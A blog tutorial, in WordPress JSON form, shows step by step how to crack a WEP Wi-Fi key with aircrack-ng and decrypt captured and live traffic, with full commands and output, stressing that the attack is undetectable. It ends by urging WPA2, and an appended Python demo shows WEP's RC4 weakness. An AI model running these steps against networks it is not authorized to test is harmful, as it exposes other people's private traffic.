{"id":370,"date":"2009-08-09T20:02:05","date_gmt":"2009-08-09T18:02:05","guid":{"rendered":"http:\/\/www.netexpertise.eu\/en\/?p=370"},"modified":"2021-10-13T21:52:58","modified_gmt":"2021-10-13T19:52:58","slug":"crack-wep-key-and-decrypt-live-traffic","status":"publish","type":"post","link":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","title":{"rendered":"How to crack a WEP key and decrypt live traffic"},"content":{"rendered":"\n<p>Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much&#8230; We are also going to decrypt traffic in real time, without ever needing to associate with the wireless access point.<br>&nbsp;<br>All steps are run as the root super-user, because the interface state needs to be changed.<br>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Aircrack Installation<\/h2>\n\n\n\n<p>Download and install aircrack-ng. It&#8217;s packaged by most Linux distributions.<br>On Debian, run<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">apt-get install aircrack-ng<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>aircrack-ng provides the tools to capture packets, crack the WEP key, and decrypt live traffic.<br>&nbsp;<br>We&#8217;ll run the tests with a Linksys PCMCIA wifi card. 
A simple ifconfig displays the card&#8217;s network stats, which tells us it has been detected.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ ifconfig\nwlan0     Link encap:Ethernet  HWaddr 00:1a:70:6b:37:4e  \n          UP BROADCAST MULTICAST  MTU:1500  Metric:1\n          RX packets:22 errors:0 dropped:0 overruns:0 frame:0\n          TX packets:63 errors:0 dropped:0 overruns:0 carrier:0\n          collisions:0 txqueuelen:1000 \n          RX bytes:3742 (3.7 KB)  TX bytes:10773 (10.7 KB)<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Capturing Packets<\/h2>\n\n\n\n<p>The interface first needs to be switched to monitor mode, so that it passes every 802.11 frame it hears to userspace instead of only the frames addressed to it. Start by checking that airmon-ng recognises the card:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airmon-ng\nInterface\tChipset\t\tDriver\nwlan0\t\tBroadcom 43xx\tb43 - [phy0]<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>airmon-ng has detected the interface as wlan0. 
It could of course have a different name, such as ath0. Stopping first makes sure no stale monitor interface is left over from a previous run; start then creates mon0:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airmon-ng stop wlan0\nInterface\tChipset\t\tDriver\nwlan0\t\tBroadcom 43xx\tb43 - [phy0]\n\t\t\t\t(monitor mode disabled)\n\nroot@crack_WEP:~$ airmon-ng start wlan0\nInterface\tChipset\t\tDriver\nwlan0\t\tBroadcom 43xx\tb43 - [phy0]\n\t\t\t\t(monitor mode enabled on mon0)<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Running iwconfig shows mon0 has been added alongside the original interface wlan0. Recent aircrack-ng releases rename the interface to wlan0mon instead of creating mon0; use whatever name airmon-ng reports in the commands that follow.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ iwconfig\nwlan0     IEEE 802.11bg  ESSID:\"\"  \n          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated   \n          Tx-Power=27 dBm   \n          Retry min limit:7   RTS thr:off   Fragment thr=2352 B   \n          Encryption key:off\n          Power Management:off\n          Link Quality:0  Signal level:0  Noise level:0\n          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0\n          Tx excessive retries:0  Invalid misc:0   Missed beacon:0\n\nmon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm   \n          Retry min limit:7   RTS thr:off   Fragment thr=2352 B   \n          Encryption key:off\n          Power Management:off\n          Link Quality:0  Signal level:0  Noise level:0\n          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0\n          Tx excessive retries:0  Invalid misc:0   Missed beacon:0<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>We can now scan the networks in range:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airodump-ng mon0\n CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01                                     \n BSSID              PWR  Beacons    #Data, #\/s  CH  MB  ENC  CIPHER AUTH ESSID\n 00:A0:C5:FF:84:72  197        4        0    0   1  11  WEP  WEP         
private\n BSSID              STATION            PWR   Rate  Lost  Packets  Probes<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>The scan shows an access point on channel 1 using WEP encryption, with BSSID (MAC address) 00:A0:C5:FF:84:72 and ESSID &#8220;private&#8221;.<br>With the target defined, we capture the frames exchanged between the access point and its clients. Locking airodump-ng to the target&#8217;s channel and BSSID stops it from hopping channels and filling the capture with unrelated traffic. Note that the capture runs on the monitor interface mon0, not on wlan0:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp mon0\n\n CH  1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52                                         \n BSSID              PWR RXQ  Beacons    #Data, #\/s  CH  MB  ENC  CIPHER AUTH ESSID\n 00:A0:C5:FF:84:72  205  10     6058    24496    0   1  54  WEP  WEP         private           \n BSSID              STATION            PWR   Rate  Lost  Packets  Probes                       \n 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795                               <\/code><\/pre>\n\n\n\n<p>&nbsp;<br>Captured packets are written to .cap files with the temp prefix (temp-01.cap here; the counter increments each time airodump-ng is restarted with the same prefix). The #Data column is the one that matters: only data frames carry the per-packet IVs the attack needs, beacons do not.<br>Cracking techniques have become much more efficient: with the PTW attack used below there is a good chance of recovering a 104-bit key from as few as 40000 captured data packets, where the older FMS\/KoreK statistical attacks needed several hundred thousand. 
Capture time depends on the amount of traffic on the air link: the attack needs distinct IVs, and a quiet network produces them slowly.<br>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Cracking the WEP key<\/h2>\n\n\n\n<p>It is now time to crack the WEP key. The -z option selects the PTW attack (the default in aircrack-ng 1.0 and later releases), -b restricts cracking to our target BSSID, and the glob picks up every capture file airodump-ng wrote with the temp prefix. aircrack-ng can be started while airodump-ng is still capturing; if it fails it re-reads the file and retries as more IVs arrive:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ aircrack-ng -z -b 00:A0:C5:FF:84:72 temp-0*.cap \n\n                                         Aircrack-ng 1.0 rc1\n\n                         [00:00:22] Tested 240228 keys (got 41742 IVs)\n\n   KB    depth   byte(vote)\n    0    0\/  1   B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640) \n    1    0\/  1   19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664) \n    2    0\/  1   31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176) \n    3    0\/  1   8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128) \n    4    0\/  1   B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616) \n    5    0\/  1   61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408) \n    6    0\/  1   DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152) \n    7    0\/  1   4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640) \n    8    0\/  1   FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104) \n    9    0\/  1   0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896) \n   10    0\/  1   E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896) \n   11    2\/  1   FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616) \n   12    0\/  4   91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788) \n\n             KEY FOUND! 
[ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ] \n\tDecrypted correctly: 100%<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>That&#8217;s right, the 104-bit key was cracked in 22 seconds from 41742 IVs. &#8220;Decrypted correctly: 100%&#8221; means aircrack-ng confirmed the candidate by decrypting captured data frames and checking their ICV, so the key is verified rather than a statistical guess.<br>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Decrypting Traffic<\/h2>\n\n\n\n<p>The traffic captured in the .cap file above can be decrypted offline into a second file, temp-01-dec.cap, which tcpdump (or Wireshark) then reads like any ordinary capture. The key is passed to airdecap-ng as a hex string:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap \nTotal number of packets read         22072\nTotal number of WEP data packets      6245\nTotal number of WPA data packets         0\nNumber of plaintext data packets         3\nNumber of decrypted WEP  packets      6245\nNumber of corrupted WEP  packets         0\nNumber of decrypted WPA  packets         0\n\nroot@crack_WEP:~$ tcpdump -r temp-01-dec.cap<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>It is also possible to decrypt live traffic in real time by feeding it to a virtual interface, at0, which can be listened on like any real interface. airtun-ng, provided in the aircrack-ng package, does exactly that: it keeps reading from the monitor interface mon0, decrypts every frame from the given BSSID with the given key, and re-emits it as a plain Ethernet frame on the tap interface at0.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0\ncreated tap interface at0\nWEP encryption specified. Sending and receiving frames through mon0.\nFromDS bit set in all frames.<\/code><\/pre>\n\n\n\n<p>&nbsp;<br>From another shell, bring the tap interface up and listen on it:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">root@crack_WEP:~$ ifconfig at0 up\nroot@crack_WEP:~$ tcpdump -i at0<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion<\/h2>\n\n\n\n<p>It is indeed very easy to crack a WEP key and listen to the traffic. Every step above is passive: nothing is ever transmitted to the access point and no association takes place, so there is nothing for the access point or a wireless IDS to detect. 
Make sure you use at least <a href=\"\/en\/linux\/configure-wpa-on-linux-howto.html\">WPA<\/a>, preferably WPA2, with a long passphrase that is not dictionary-based: WEP shares one static key between every client, and whoever recovers it can read everyone&#8217;s traffic, past and future.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much&#8230; We are going to decrypt traffic in real time as well without even needing to connect to the wireless access point.&nbsp;All steps will be run under root super-user as the interface state needs to be changed.&nbsp; Aircrack Installation [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"categories":[11,32],"tags":[386,389,97],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.8.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Netexpertise - How to crack a WEP key and decrypt live traffic<\/title>\n<meta name=\"description\" content=\"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... Here is how to\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Netexpertise - How to crack a WEP key and decrypt live traffic\" \/>\n<meta property=\"og:description\" content=\"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... 
Here is how to\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\" \/>\n<meta property=\"og:site_name\" content=\"Netexpertise\" \/>\n<meta property=\"article:published_time\" content=\"2009-08-09T18:02:05+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-10-13T19:52:58+00:00\" \/>\n<meta name=\"author\" content=\"dave\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@netexpertise\" \/>\n<meta name=\"twitter:site\" content=\"@netexpertise\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\",\"url\":\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\",\"name\":\"Netexpertise - How to crack a WEP key and decrypt live traffic\",\"isPartOf\":{\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#website\"},\"datePublished\":\"2009-08-09T18:02:05+00:00\",\"dateModified\":\"2021-10-13T19:52:58+00:00\",\"author\":{\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/cb4cd666549d22e9070ec1cfc1a496fa\"},\"description\":\"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... 
Here is how to\",\"breadcrumb\":{\"@id\":\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.netexpertise.eu\/en\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to crack a WEP key and decrypt live traffic\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#website\",\"url\":\"https:\/\/www.netexpertise.eu\/en\/\",\"name\":\"Netexpertise\",\"description\":\"Systems \/ Networks \/ DevOps\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.netexpertise.eu\/en\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/cb4cd666549d22e9070ec1cfc1a496fa\",\"name\":\"dave\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/image\/\",\"url\":\"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g\",\"contentUrl\":\"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g\",\"caption\":\"dave\"},\"sameAs\":[\"http:\/\/www.netexpertise.eu\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Netexpertise - How to crack a WEP key and decrypt live traffic","description":"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... 
Here is how to","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","og_locale":"en_US","og_type":"article","og_title":"Netexpertise - How to crack a WEP key and decrypt live traffic","og_description":"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... Here is how to","og_url":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","og_site_name":"Netexpertise","article_published_time":"2009-08-09T18:02:05+00:00","article_modified_time":"2021-10-13T19:52:58+00:00","author":"dave","twitter_card":"summary_large_image","twitter_creator":"@netexpertise","twitter_site":"@netexpertise","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","url":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","name":"Netexpertise - How to crack a WEP key and decrypt live traffic","isPartOf":{"@id":"https:\/\/www.netexpertise.eu\/en\/#website"},"datePublished":"2009-08-09T18:02:05+00:00","dateModified":"2021-10-13T19:52:58+00:00","author":{"@id":"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/cb4cd666549d22e9070ec1cfc1a496fa"},"description":"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... 
Here is how to","breadcrumb":{"@id":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.netexpertise.eu\/en"},{"@type":"ListItem","position":2,"name":"How to crack a WEP key and decrypt live traffic"}]},{"@type":"WebSite","@id":"https:\/\/www.netexpertise.eu\/en\/#website","url":"https:\/\/www.netexpertise.eu\/en\/","name":"Netexpertise","description":"Systems \/ Networks \/ DevOps","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.netexpertise.eu\/en\/?s={search_term_string}"},"query-input":"required 
name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/cb4cd666549d22e9070ec1cfc1a496fa","name":"dave","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/image\/","url":"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g","contentUrl":"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g","caption":"dave"},"sameAs":["http:\/\/www.netexpertise.eu"]}]}},"_links":{"self":[{"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/posts\/370"}],"collection":[{"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/comments?post=370"}],"version-history":[{"count":0,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/posts\/370\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/media?parent=370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/categories?post=370"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/tags?post=370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
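What airdecap-ng and airtun-ng do with the recovered key, as an added example that is not part of the original article and is not aircrack-ng code: a minimal WEP encrypt/decrypt in Python, using the key found above (RC4 keyed with IV||key, CRC-32 ICV). It goes one step further than the article and also shows why collecting IVs is all the attack needs: two frames sent under the same IV share a keystream, so XORing their ciphertexts yields the XOR of the plaintexts without any key. The frame layout (IV, key-id byte, encrypted body, no 802.11 header), the sample IV and the sample payloads are assumptions constructed for the example, not data from the article's capture.

```python
"""Minimal WEP frame-body encryption/decryption, the operation airdecap-ng
and airtun-ng perform once the key is known.  Added example, not aircrack-ng
code.  Assumptions (not from the article): a frame body is modelled as
IV(3 bytes) | key-id byte | RC4(IV || key, payload || CRC-32 ICV), the
802.11 header is omitted, and the sample IV and payloads are constructed."""
import struct
import zlib
from typing import Optional

# 104-bit (13-byte) key recovered by aircrack-ng in the article.
WEP_KEY = bytes.fromhex("b919318cb261dd4efb0baa6299")

# Constructed sample data: an LLC/SNAP header (IPv4 ethertype) in front of
# a fake payload, and a fixed 24-bit IV.
SAMPLE_IV = bytes.fromhex("0a1b2c")
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")
SAMPLE_PLAINTEXT = LLC_SNAP_IP + b"GET / HTTP/1.0\r\n"
OTHER_PLAINTEXT = LLC_SNAP_IP + b"USER alice\r\n"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling, then keystream XOR), WEP's only cipher."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, no key involved."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes, key_id: int = 0) -> bytes:
    """Build a WEP frame body.  The per-packet RC4 key is IV || key and the IV
    travels in the clear, which is why an attacker can simply collect IVs."""
    if len(iv) != 3:
        raise ValueError("WEP IV must be 3 bytes")
    if len(key) not in (5, 13):
        raise ValueError("WEP key must be 40-bit (5 bytes) or 104-bit (13 bytes)")
    return iv + bytes([(key_id & 3) << 6]) + rc4(iv + key, payload + icv(payload))


def wep_decrypt(key: bytes, frame_body: bytes) -> bytes:
    """Inverse of wep_encrypt.  Raises ValueError when the ICV does not match,
    which is how a wrong key or a damaged frame shows up; airdecap-ng reports
    such frames as 'corrupted WEP packets'."""
    if len(frame_body) < 3 + 1 + 4:
        raise ValueError("frame body too short to hold IV, key-id byte and ICV")
    iv, ciphertext = frame_body[:3], frame_body[4:]
    plain = rc4(iv + key, ciphertext)
    payload, received_icv = plain[:-4], plain[-4:]
    if icv(payload) != received_icv:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return payload


def decrypts_with(key: bytes, frame_body: bytes) -> bool:
    """True if the key reproduces a valid ICV: the check aircrack-ng performs
    to confirm a candidate key ('Decrypted correctly: 100%')."""
    try:
        wep_decrypt(key, frame_body)
        return True
    except ValueError:
        return False


def keystream_reuse(frame_a: bytes, frame_b: bytes) -> Optional[bytes]:
    """Two frames under the same IV (a 24-bit space, so reuse is inevitable)
    share a keystream: ciphertext_a XOR ciphertext_b equals plaintext_a XOR
    plaintext_b, with no key needed.  Returns None if the IVs differ."""
    if frame_a[:3] != frame_b[:3]:
        return None
    n = min(len(frame_a), len(frame_b)) - 4
    return bytes(a ^ b for a, b in zip(frame_a[4:4 + n], frame_b[4:4 + n]))


def demo() -> tuple:
    """Encrypt the constructed payloads, decrypt one back, show the IV leak,
    and check that an all-zero key is rejected by the ICV."""
    frame = wep_encrypt(WEP_KEY, SAMPLE_IV, SAMPLE_PLAINTEXT)
    other = wep_encrypt(WEP_KEY, SAMPLE_IV, OTHER_PLAINTEXT)  # same IV reused
    recovered = wep_decrypt(WEP_KEY, frame)
    leak = keystream_reuse(frame, other)
    return recovered, leak, decrypts_with(bytes(13), frame)


if __name__ == "__main__":
    recovered, leak, wrong_key_ok = demo()
    print("decrypted:", recovered)
    print("plaintext XOR under reused IV:", leak.hex())
    print("all-zero key accepted:", wrong_key_ok)
```

In the leaked XOR the first eight bytes are zero because both frames start with the same LLC/SNAP header, and the bytes after that are the XOR of the two application payloads; knowing or guessing one plaintext (protocol headers are highly predictable) reveals the other, which is the property the statistical attacks in aircrack-ng build on at the level of individual key bytes.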